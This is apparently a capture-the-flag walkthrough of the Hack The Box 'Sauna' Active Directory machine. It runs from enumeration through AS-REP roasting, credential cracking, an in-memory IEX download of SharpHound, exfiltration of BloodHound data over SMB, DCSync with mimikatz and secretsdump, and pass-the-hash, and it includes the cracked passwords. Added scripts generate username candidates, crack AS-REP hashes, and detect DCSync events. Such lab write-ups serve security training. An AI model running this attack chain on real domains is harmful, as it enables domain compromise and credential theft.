nmap -A -p- -oA sauna 10.129.95.180 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA sauna 10.129.95.180

nmap -sU -O -p- -oA sauna-udp 10.129.95.180

nikto -h 10.129.95.180:80

whatweb http://10.129.95.180

rpcclient -U "" 10.129.95.180 -N

enumdomusers

We download and build Kerbrute:

git clone https://github.com/ropnop/kerbrute.git

cd kerbrute

go build -ldflags "-s -w"

du -hc kerbrute

upx kerbrute

We add egotistical-bank.local to /etc/hosts.

To run kerbrute we need the domain name, which crackmapexec also confirms in its SMB banner:

crackmapexec smb 10.129.95.180

./kerbrute userenum --dc 10.129.95.180 -d egotistical-bank.local /usr/share/seclists/Usernames/top-usernames-shortlist.txt

smbclient -L 10.129.95.180 -N

smbmap -H 10.129.95.180 -u 'null'

smbmap -H 10.129.95.180

The about page lists the staff; we pull the names out of the <p class="mt-2"> elements (-X GET is the default for curl, and the pattern needs real quotes around mt-2 for grep to match it):

curl -s "http://10.129.95.180/about.html" | grep 'p class="mt-2"'

curl -s "http://10.129.95.180/about.html" | grep 'p class="mt-2"' | grep "Fergus Smith" -A 100 | html2text

curl -s "http://10.129.95.180/about.html" | grep 'p class="mt-2"' | grep "Fergus Smith" -A 100 | html2text > users

cat users > backup

tr '[:upper:]' '[:lower:]' < users | sponge users
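
Lowercasing the scraped names only helps if the domain's logon names are the full names. Usually they are not (on this box fsmith is "first initial + surname"), so the list should carry every common Active Directory convention per person. The script below is an added example, not part of the original write-up; its sample names are constructed, apart from Fergus Smith, the one name the write-up grepped for, and its output can be fed straight to kerbrute userenum or GetNPUsers.py -usersfile.

```python
"""Turn full names from a staff page into AD logon-name candidates.

Added example (not the write-up's code). Emits the usual Active Directory naming
conventions for each person, lowercased and de-duplicated in order, so the result
works as a wordlist for kerbrute userenum or GetNPUsers.py -usersfile.
"""
import re
from typing import Callable, Dict, Iterable, List, Optional, Tuple

# Honorifics that are not part of a logon name.
TITLES = {"mr", "mrs", "ms", "miss", "dr", "prof", "sir"}

# Convention name -> builder taking (first, last), both already lowercase ASCII letters.
CONVENTIONS: Dict[str, Callable[[str, str], str]] = {
    "flast": lambda f, l: f[0] + l,            # fsmith (what this box uses)
    "first.last": lambda f, l: f + "." + l,    # fergus.smith
    "first_last": lambda f, l: f + "_" + l,
    "firstlast": lambda f, l: f + l,
    "firstl": lambda f, l: f + l[0],           # ferguss
    "lastf": lambda f, l: l + f[0],            # smithf
    "f.last": lambda f, l: f[0] + "." + l,
    "last.first": lambda f, l: l + "." + f,
    "first": lambda f, l: f,
    "last": lambda f, l: l,
}


def split_name(full_name: str) -> Optional[Tuple[str, str]]:
    """Lowercase, drop titles and punctuation, return (first, last); None if fewer than two tokens."""
    tokens = [re.sub(r"[^a-z]", "", t) for t in full_name.lower().split()]
    tokens = [t for t in tokens if t and t not in TITLES]
    if len(tokens) < 2:
        return None
    return tokens[0], tokens[-1]  # middle names and particles dropped; hyphens already collapsed


def candidates(full_names: Iterable[str], conventions=CONVENTIONS) -> List[str]:
    """Ordered, de-duplicated list: every convention for the first person, then the next, ..."""
    seen, out = set(), []
    for name in full_names:
        parts = split_name(name)
        if parts is None:
            continue
        for build in conventions.values():
            user = build(*parts)
            if user not in seen:
                seen.add(user)
                out.append(user)
    return out


# Constructed sample: the write-up's Fergus Smith plus made-up entries that exercise titles and punctuation.
SAMPLE_NAMES = ["Fergus Smith", "Dr. Ann O'Neill", "Jean-Luc de la Cruz", "Cher"]

if __name__ == "__main__":
    print("\n".join(candidates(SAMPLE_NAMES)))
```

Ten candidates per person is cheap for kerbrute (one AS-REQ each, no lockout risk because no password is tried), so it is worth enumerating all conventions rather than guessing one.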

Since I only have usernames and no passwords, the next step is AS-REP roasting: we request a TGT for each user without pre-authentication, and any account with "Do not require Kerberos preauthentication" set gets an AS-REP back whose encrypted part is keyed by that user's password hash, so it can be cracked offline. The hash is written to a file for john:

python3 /opt/impacket/examples/GetNPUsers.py egotistical-bank.local/ -no-pass -usersfile users -outputfile hash

cat hash

john --wordlist=/usr/share/wordlists/rockyou.txt hash
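
What john is doing with each rockyou line against that $krb5asrep$23$ hash is shown below as an added example, not the write-up's code: derive the candidate's NT hash, turn it into the RC4-HMAC key, decrypt the AS-REP enc-part and see whether the embedded HMAC verifies. MD4 and RC4 are implemented in the block so it runs without OpenSSL's legacy provider. The hash line it cracks is constructed here by asrep_encrypt() with the password found on this page; it is not the real capture, and the function's key_usage parameter (8 for an AS-REP, 2 for a TGS-REP) goes beyond the page in that the same check covers the Kerberoast hashes GetUserSPNs produces later.

```python
"""What john does per candidate on an etype-23 ($krb5asrep$23$) AS-REP hash, in pure Python.

Added example, not the write-up's code. The NT hash (MD4 of the UTF-16LE password) is the RC4-HMAC
Kerberos key, so a guess costs one MD4, three HMAC-MD5 and one RC4. MD4 and RC4 are written out so
this runs without OpenSSL's legacy provider. SAMPLE_LINE is constructed here by asrep_encrypt()
with the password from this page (not the real capture); its inner bytes only stand in for the
ASN.1 EncASRepPart.
"""
import hashlib
import hmac
import struct
from typing import Iterable, Optional, Tuple

MASK = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4: MD5-style padding, three rounds of 16 steps, little-endian state out."""
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & MASK
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    msg = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", 8 * len(data))
    a0, b0, c0, d0 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = a0, b0, c0, d0
        for i in range(16):  # round 1: no constant, X[i] in order
            a, b, c, d = d, rotl((a + f(b, c, d) + x[i]) & MASK, (3, 7, 11, 19)[i % 4]), b, c
        for i in range(16):  # round 2: X[0,4,8,12,1,5,...]
            k = (i % 4) * 4 + i // 4
            a, b, c, d = d, rotl((a + g(b, c, d) + x[k] + 0x5A827999) & MASK, (3, 5, 9, 13)[i % 4]), b, c
        for i in range(16):  # round 3: X[0,8,4,12,2,10,...]
            k = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)[i]
            a, b, c, d = d, rotl((a + h(b, c, d) + x[k] + 0x6ED9EBA1) & MASK, (3, 9, 11, 15)[i % 4]), b, c
        a0, b0, c0, d0 = (a0 + a) & MASK, (b0 + b) & MASK, (c0 + c) & MASK, (d0 + d) & MASK
    return struct.pack("<4I", a0, b0, c0, d0)

def nt_hash(password: str) -> bytes:
    """NTLM hash; also the Kerberos key for etype 23 (RC4-HMAC)."""
    return md4(password.encode("utf-16-le"))

def rc4(key: bytes, data: bytes) -> bytes:
    s, j = list(range(256)), 0
    for i in range(256):  # key scheduling
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:  # keystream XOR
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def _hmac_md5(key: bytes, msg: bytes) -> bytes:
    return hmac.new(key, msg, hashlib.md5).digest()

def asrep_encrypt(password: str, plaintext: bytes, confounder: bytes = bytes(8), key_usage: int = 8) -> bytes:
    """RFC 4757 encryption; key usage 8 = AS-REP enc-part, 2 = TGS-REP ticket (Kerberoast)."""
    k1 = _hmac_md5(nt_hash(password), struct.pack("<I", key_usage))
    data = confounder + plaintext
    checksum = _hmac_md5(k1, data)
    return checksum + rc4(_hmac_md5(k1, checksum), data)

def asrep_check(password: str, edata: bytes, key_usage: int = 8) -> bool:
    """Derive the candidate's key, decrypt, and see whether the leading 16-byte HMAC verifies."""
    checksum, ciphertext = edata[:16], edata[16:]
    k1 = _hmac_md5(nt_hash(password), struct.pack("<I", key_usage))
    plaintext = rc4(_hmac_md5(k1, checksum), ciphertext)
    return hmac.compare_digest(_hmac_md5(k1, plaintext), checksum)

def parse_asrep_line(line: str) -> Tuple[str, bytes]:
    """'$krb5asrep$23$user@REALM:<checksum hex>$<cipher hex>', the layout GetNPUsers.py prints."""
    prefix = "$krb5asrep$23$"
    if not line.startswith(prefix):
        raise ValueError("not an etype 23 AS-REP hash")
    principal, rest = line[len(prefix):].split(":", 1)
    checksum_hex, cipher_hex = rest.split("$", 1)
    return principal, bytes.fromhex(checksum_hex) + bytes.fromhex(cipher_hex)

def crack_asrep(line: str, wordlist: Iterable[str]) -> Optional[str]:
    _, edata = parse_asrep_line(line)
    return next((pw for pw in wordlist if asrep_check(pw, edata)), None)

# Constructed vector: a stand-in enc-part encrypted under the password cracked on this page.
SAMPLE_EDATA = asrep_encrypt("Thestrokes23", b"\x79\x81\x00 stand-in for EncASRepPart", confounder=b"\x01" * 8)
SAMPLE_LINE = "$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:%s$%s" % (SAMPLE_EDATA[:16].hex(), SAMPLE_EDATA[16:].hex())
SMALL_WORDLIST = ["123456", "password", "thestrokes23", "Thestrokes23", "letmein"]

if __name__ == "__main__":
    print(crack_asrep(SAMPLE_LINE, SMALL_WORDLIST))
```

This is why AS-REP roasting is cheap for the attacker: there is no salt and no slow KDF in RC4-HMAC, one MD4 per guess, which is the case for hashcat mode 18200 and john's krb5asrep format. Accounts that only issue AES (etype 17/18) responses cost a PBKDF2 per guess instead.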

We get the credentials:

fsmith:Thestrokes23

crackmapexec smb 10.129.95.180 -u 'fsmith' -p 'Thestrokes23'

evil-winrm -i 10.129.95.180 -u 'fsmith' -p 'Thestrokes23'

whoami /priv

Being a member of Remote Management Users is what lets us log in over WinRM; whoami /all shows the group membership:

whoami /all

We create a working directory under C:\Windows\Temp (C:\Windows\Temp\test, where the tools uploaded later go).

Our clock is out of sync with the DC, and Kerberos rejects requests when the skew exceeds 5 minutes (KRB_AP_ERR_SKEW), so we synchronise against the DC:

sudo rdate -n 10.129.95.180

We run GetUserSPNs again and this time it works:

python3 /opt/impacket/examples/GetUserSPNs.py egotistical-bank.local/fsmith:Thestrokes23 -request

We download winPEAS.

net user /domain

net user HSmith

upload winPEASx64.exe

winPEAS turns up a cleartext password for the svc_loanmgr account:

net user

net user svc_loanmgr

crackmapexec winrm 10.129.95.180 -u 'svc_loanmgr' -p 'Moneymakestheworldgoround!'

evil-winrm -i 10.129.95.180 -u 'svc_loanmgr' -p 'Moneymakestheworldgoround!'

We check this user's privileges and group memberships:

whoami /all

On the attacking box we start neo4j in one terminal and BloodHound in another:

sudo neo4j console

bloodhound &> /dev/null &

We fetch SharpHound.ps1 from https://github.com/puckiestyle/powershell/blob/master/SharpHound.ps1 and serve it from the attacking box:

sudo python3 -m http.server 80

Then we load it in memory on the target from the evil-winrm session:

IEX(New-Object Net.WebClient).downloadString('http://10.10.14.135/SharpHound.ps1')

grep "Invoke-Bloodhound" SharpHound.ps1

We run that function and it produces a zip with the collected data:

Invoke-BloodHound -CollectionMethod All

To get the zip back we share a folder from the attacking box with impacket's smbserver, then map it from the target and copy the file across:

sudo python3 /opt/impacket/examples/smbserver.py smbFolder $(pwd) -smb2support -username cu3rv0x -password password123

net use x: \\10.10.14.135\smbFolder /user:cu3rv0x password123

copy 2012..._Bloodhound.zip x:\2012...BloodHound.zip

We upload the zip into BloodHound.

Under Analysis we click "Find AS-REP Roastable Users".

Then "List all Kerberoastable Accounts".

Then "Find Shortest Paths to Domain Admins".

We search for FSMITH and choose "Mark as Owned", and do the same for HSMITH.

We click "Find Principals with DCSync Rights" and see that svc_loanmgr has them, the GetChanges/GetChangesAll edges to the domain object that a DCSync needs:

cp /usr/share/mimikatz/x64/mimikatz.exe .

sudo python3 -m http.server 80

We run mimikatz non-interactively, with the command and then 'exit' as arguments; without the trailing exit it drops into its interactive prompt, which under evil-winrm never returns:

C:\Windows\Temp\test\mimikatz.exe 'lsadump::dcsync /domain:egotistical-bank.local /user:Administrator' 'exit'

The same DCSync can be done from the attacking box with secretsdump, entering Moneymakestheworldgoround! as the password when prompted:

python3 /opt/impacket/examples/secretsdump.py egotistical-bank.local/svc_loanmgr@10.129.95.180

And we pass the hash with evil-winrm, using the Administrator NT hash from the dump:

evil-winrm -i 10.129.95.180 -u 'Administrator' -H 82345..
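
From the defender's side, what svc_loanmgr just did is a directory replication request, and the DC audits it as Security event 4662 on the domain object with the replication control-access rights listed in the Properties field. The script below is an added detection example, not part of the original write-up: it flags 4662 records that exercise those rights from any account that is not a domain controller. The one-line key=value records are a constructed rendering of the relevant fields (not Windows' XML layout), and the account names and the DC01$ allow-list are assumptions.

```python
"""Flag DCSync attempts in Windows Security event 4662 records.

Added detection example, not part of the original write-up. DCSync is a replication
request, audited by the DC as 4662 on the domain object with the replication rights in
Properties. Records below are a constructed key=value rendering of the relevant fields,
not Windows' XML layout; account names and the DC list are assumptions.
"""
import re
from typing import Dict, Iterable, List, Set

# Control-access rights a replication partner needs; Get-Changes-All is the one that returns secrets.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
GUID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}", re.I)
FIELD_RE = re.compile(r"(\w+)=(.*?)(?=\s+\w+=|$)")


def parse_event(line: str) -> Dict[str, str]:
    """Split 'Key=value Key2=value ...' into a dict; a value may contain spaces (the GUID list)."""
    return dict(FIELD_RE.findall(line))


def dcsync_alerts(lines: Iterable[str], dc_accounts: Set[str]) -> List[Dict[str, object]]:
    """One alert per 4662 that exercises replication rights from an account that is not a DC."""
    dcs = {name.upper() for name in dc_accounts}
    alerts = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") != "4662":
            continue
        used = {g.lower() for g in GUID_RE.findall(ev.get("Properties", ""))} & REPLICATION_RIGHTS.keys()
        if not used:
            continue
        subject = ev.get("SubjectUserName", "")
        if subject.upper() in dcs:
            continue  # domain controllers replicate with each other; that is the legitimate case
        alerts.append({
            "subject": subject,
            "domain": ev.get("SubjectDomainName", ""),
            "rights": sorted(REPLICATION_RIGHTS[g] for g in used),
            "complete": GET_CHANGES_ALL in used,  # only with Get-Changes-All can password hashes be pulled
        })
    return alerts


# Constructed sample log (not real DC output).
SAMPLE_EVENTS = [
    "EventID=4662 SubjectUserName=DC01$ SubjectDomainName=EGOTISTICAL-BANK ObjectType=domainDNS "
    "Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    "EventID=4662 SubjectUserName=svc_loanmgr SubjectDomainName=EGOTISTICAL-BANK ObjectType=domainDNS "
    "Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    "EventID=4662 SubjectUserName=fsmith SubjectDomainName=EGOTISTICAL-BANK ObjectType=user "
    "Properties={0badcafe-0000-4000-8000-000000000001}",  # constructed, unrelated right
    "EventID=4624 SubjectUserName=fsmith SubjectDomainName=EGOTISTICAL-BANK LogonType=3",
    "EventID=4662 SubjectUserName=auditor01 SubjectDomainName=EGOTISTICAL-BANK ObjectType=domainDNS "
    "Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}",  # Get-Changes only: no secrets, still odd
]

if __name__ == "__main__":
    for alert in dcsync_alerts(SAMPLE_EVENTS, {"DC01$"}):
        print(alert)
```

4662 is only written when "Audit Directory Service Access" is enabled and the domain object carries a SACL for the replication rights, so check that first; the BloodHound query used above is the same question asked of the ACL ahead of time rather than of the log afterwards.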

copyright©2022 Cu3rv0x all rights reserved